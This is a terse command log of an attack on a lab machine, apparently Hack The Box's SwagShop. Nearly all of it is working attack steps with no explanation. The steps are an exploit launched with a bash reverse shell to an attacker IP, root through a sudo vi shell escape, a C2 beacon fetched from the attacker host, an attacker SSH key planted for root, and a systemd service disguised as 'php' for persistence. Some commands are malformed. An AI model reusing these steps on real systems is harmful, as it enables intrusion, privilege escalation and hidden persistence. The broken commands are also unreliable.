master
Raw Download raw file 
  1### setup
  2
  3sudo apt install -y \
  4	nmap curl python3-venv make zip unzip \
  5	mtr
  6
  7sudo openvpn --config htb.ovpn
  82025-04-05T08:04:58-04:00
  9
 10### T1 10.129.232.93
 11
 12ping -c 1 10.129.232.93
 13
 14python3 -m venv venv
 15source venv/bin/activate
 16python3 -m pip install mechanize
 17python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"
 182025-04-05T08:05:44-04:00
 19
 20
 21which curl
 22/usr/bin/curl
 23
 24uname -a
 25Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 26
 27cat /etc/os-release
 28NAME="Ubuntu"
 29VERSION="18.04.6 LTS (Bionic Beaver)"
 30ID=ubuntu
 31ID_LIKE=debian
 32PRETTY_NAME="Ubuntu 18.04.6 LTS"
 33VERSION_ID="18.04"
 34HOME_URL="https://www.ubuntu.com/"
 35SUPPORT_URL="https://help.ubuntu.com/"
 36BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
 37PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
 38VERSION_CODENAME=bionic
 39UBUNTU_CODENAME=bionic
 40
 41sudo -l
 42sudo -l
 43Matching Defaults entries for www-data on swagshop:
 44    env_reset, mail_badpass,
 45    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 46
 47User www-data may run the following commands on swagshop:
 48    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
 49
 50sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
 51uid=0(root) gid=0(root) groups=0(root)
 52
 53mkdir -f /tmp/.X1-lock/
 54curl -L -O g
 55
 56 10.10.14.4
 57
 58generate beacon  --http http://10.10.14.4:4444 --seconds 20 --os linux
 59http --lport 4444
 60
 61curl -s -L http://10.10.14.4:8080/php -o /usr/sbin/php
 62chmod +x /tmp/.php
 63/tmp/.php
 642025-04-05T08:25:45-04:00
 65
 66root_rsa.pub
 67ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
 68
 69
 70mkdir /root/.ssh/
 71upload /home/user/swag/2025-04-05/root_rsa.pub /root/.ssh/authorized_keys
 72chmod /root/.ssh/authorized_keys 0400
 73
 74cat /etc/ssh/sshd_config
 75#PermitRootLogin prohibit-password
 76
 77ssh -vvv root@10.129.232.93 -T /bin/bash
 782025-04-05T08:44:17-04:00
 79
 80mv /tmp/.php /usr/sbin/php
 81
 82php service
 83
 84[Unit]
 85Description=php service
 86After=network.target
 87Type=simple
 88Restart=always
 89RestartSec=1
 90ExecStart=/usr/sbin/php
 91
 92[Install]
 93WantedBy=multi-user.target
 94
 95upload -o /home/user/swag/2025-04-05/out/php.service /lib/systemd/system/php.service
 96execute systemctl daemon-reload
 97execute systemctl enable php.service
 98execute systemctl start php.service
 99
100good service
101